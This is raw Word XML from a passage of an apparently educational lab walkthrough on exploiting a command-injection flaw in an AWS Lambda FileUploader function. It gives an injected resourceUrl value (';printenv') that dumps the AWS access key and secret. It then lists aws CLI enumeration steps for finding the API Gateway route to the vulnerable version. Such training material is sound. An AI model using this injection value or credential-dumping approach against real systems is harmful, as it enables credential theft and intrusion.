        <w:t xml:space="preserve">The difference between the two versions of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> function is that</w:t>
      </w:r>
      <w:r w:rsidR="00545BC6">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50579CB2" w14:textId="22E045C5" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="00545BC6" w:rsidP="00545BC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:t xml:space="preserve">he first version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> function uses curl command before checking whether the username and password are in the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:t>AllowedUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:t xml:space="preserve">" table. Since the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:t>resourceUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> is concatenated to the string and is passed to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:t>child_process.execSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> function, the first version of the lambda function is vulnerable to command injection attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD98A95" w14:textId="1D10701C" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="63F2F03B" w14:textId="77777777" w:rsidR="00F9324D" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Upon passing the following value in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>resourceUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA67822" w14:textId="48183696" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Value: ​www.pentesteracademy.com;printenv </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1334FDAD" w14:textId="77777777" w:rsidR="00F9324D" w:rsidRDefault="00F9324D" w:rsidP="0094232C"/>
    <w:p w14:paraId="165B6986" w14:textId="79F6FC2B" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The command which is to be executed becomes: "./bin/curl --silent -L www.pentesteracademy.com;printenv", therefore two commands are executed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB7AAA2" w14:textId="77777777" w:rsidR="00F9324D" w:rsidRDefault="00F9324D" w:rsidP="0094232C"/>
    <w:p w14:paraId="2B50DEF7" w14:textId="72F499A8" w:rsidR="001F3CA3" w:rsidRPr="00F9324D" w:rsidRDefault="0094232C" w:rsidP="00F9324D">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1: ​./bin/curl --silent -L www.pentesteracademy.com </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC03DC" w14:textId="780678B0" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00F9324D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>Command 2: ​</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>printenv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A20E6E" w14:textId="77777777" w:rsidR="00F9324D" w:rsidRDefault="00F9324D" w:rsidP="0094232C"/>
    <w:p w14:paraId="385CE205" w14:textId="1D19D235" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The second command will dump out the environment variable which includes the Access Key and Secret. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7346A3CA" w14:textId="77777777" w:rsidR="001F3CA3" w:rsidRPr="0094232C" w:rsidRDefault="001F3CA3" w:rsidP="0094232C"/>
    <w:p w14:paraId="5E579E26" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00F9324D">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 48: ​Identify a way to invoke the first version of lambda function. Check if there is an alias for the function. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625B0AD1" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00F13EDE">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lambda list-aliases --function-name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5E66CF" w14:textId="77777777" w:rsidR="00F13EDE" w:rsidRDefault="00F13EDE" w:rsidP="0094232C"/>
    <w:p w14:paraId="59BAED29" w14:textId="0929318B" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page41image66243216" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="400CA338" wp14:editId="25871D7E">
            <wp:extent cx="5731510" cy="2154555"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="17145"/>
            <wp:docPr id="37" name="Picture 37" descr="page41image6624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age41image6624321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2154555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="732913AF" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">There is an alias for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> Function, the name of the alias is "default". Additional Version weights are mentioned which results in alias routing. 92% of the traffic is routed to </w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">version 2 of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> function. 8% of the traffic is routed to version 1 of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> function. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3607A563" w14:textId="25C07F64" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="5E60A752" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00F9324D">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 49: ​Identity the invocation URL which is used to invoke the "default" alias of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> function. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFFE542" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00F13EDE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>Command: ​aws apigateway get-rest-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>apis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6148AFF8" w14:textId="77777777" w:rsidR="00EA4ABF" w:rsidRDefault="00EA4ABF" w:rsidP="0094232C"/>
    <w:p w14:paraId="2A3B8858" w14:textId="48EA5842" w:rsidR="00EA4ABF" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page42image66244880" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20E5F3D3" wp14:editId="00FE257C">
            <wp:extent cx="5731510" cy="3967480"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="7620"/>
            <wp:docPr id="34" name="Picture 34" descr="page42image6624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age42image6624488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3967480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="400AE11B" w14:textId="76DCB885" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page42image66250704" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C7A604" wp14:editId="06584694">
            <wp:extent cx="5731510" cy="1209040"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="10160"/>
            <wp:docPr id="33" name="Picture 33" descr="page42image6625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age42image6625070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1209040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9FC480" w14:textId="77777777" w:rsidR="00BB096B" w:rsidRPr="0094232C" w:rsidRDefault="00BB096B" w:rsidP="0094232C"/>
    <w:p w14:paraId="7C6A9143" w14:textId="185C3DFC" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page43image66245088" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="332DE432" wp14:editId="1EE1B1A8">
            <wp:extent cx="5731510" cy="1511300"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="12700"/>
            <wp:docPr id="30" name="Picture 30" descr="page43image6624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age43image6624508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1511300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F53A9FC" w14:textId="58867A47" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">There is an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> named "file-uploader-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">", it is possible that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> invokes the file-uploader function. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0DD9BF" w14:textId="77777777" w:rsidR="001F3CA3" w:rsidRPr="0094232C" w:rsidRDefault="001F3CA3" w:rsidP="0094232C"/>
    <w:p w14:paraId="6E5AB3CF" w14:textId="6B64F760" w:rsidR="00EA4ABF" w:rsidRDefault="0094232C" w:rsidP="00F9324D">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 50: ​Get the resources of the rest </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> with id "x5a88cfb22". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ACD8B9" w14:textId="432144D7" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00EA4ABF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t>Command: ​aws apigateway get-resources --rest-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">-id x5a88cfb22 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60673648" w14:textId="77777777" w:rsidR="00F9324D" w:rsidRDefault="00F9324D" w:rsidP="0094232C"/>
    <w:p w14:paraId="6D03298A" w14:textId="491C5EA2" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page43image66244464" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02982D0E" wp14:editId="03C33F1B">
            <wp:extent cx="5731510" cy="2739390"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="16510"/>
            <wp:docPr id="29" name="Picture 29" descr="page43image6624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age43image6624446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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5D8866" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The resource id is uoz284. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4118353B" w14:textId="3A9DE885" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="6D59B486" w14:textId="77777777" w:rsidR="00356C40" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 51: ​Retrieve the method information for the above resource and the POST method: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FCC095" w14:textId="77777777" w:rsidR="00356C40" w:rsidRDefault="0094232C" w:rsidP="00356C40">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3152AE3D" w14:textId="59EBF98A" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00356C40">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>​aws apigateway get-method --rest-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>-id x5a88cfb22 --resource-id uoz284</w:t>
      </w:r>
      <w:r w:rsidR="00356C40">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve">--http-method GET </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EE24CB" w14:textId="77777777" w:rsidR="00F9324D" w:rsidRDefault="00F9324D" w:rsidP="0094232C"/>
    <w:p w14:paraId="4BF332A6" w14:textId="729A424B" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page44image66245504" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44865976" wp14:editId="087EAEE0">
            <wp:extent cx="5731510" cy="3582670"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="11430"/>
            <wp:docPr id="26" name="Picture 26" descr="page44image6624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age44image6624550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3582670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77710587" w14:textId="34DACDF9" w:rsidR="007A7AA0" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:t>The resource "v1" invokes the "default" alias of the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">" function. Step 52: ​List the stages of the rest </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> with id "x5a88cfb22".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491C8EB1" w14:textId="77777777" w:rsidR="002D6916" w:rsidRDefault="002D6916" w:rsidP="0094232C"/>
    <w:p w14:paraId="4BEAF800" w14:textId="60352E4D" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="007A7AA0">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>Command: ​aws apigateway get-stages --rest-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve">-id x5a88cfb22 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1038EED8" w14:textId="56EE0391" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="732F9BF3" w14:textId="040BB5EF" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page45image66240720" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="689BD4D4" wp14:editId="5C9393C8">
            <wp:extent cx="5731510" cy="2560955"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="17145"/>
            <wp:docPr id="23" name="Picture 23" descr="page45image6624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page45image6624072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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="047E9E0F" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">There is one stage named "default" for the rest API. Based on the stages, resource and the region, the invocation URL can be formulated. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF01F9D" w14:textId="77777777" w:rsidR="002D6916" w:rsidRDefault="002D6916" w:rsidP="0094232C"/>
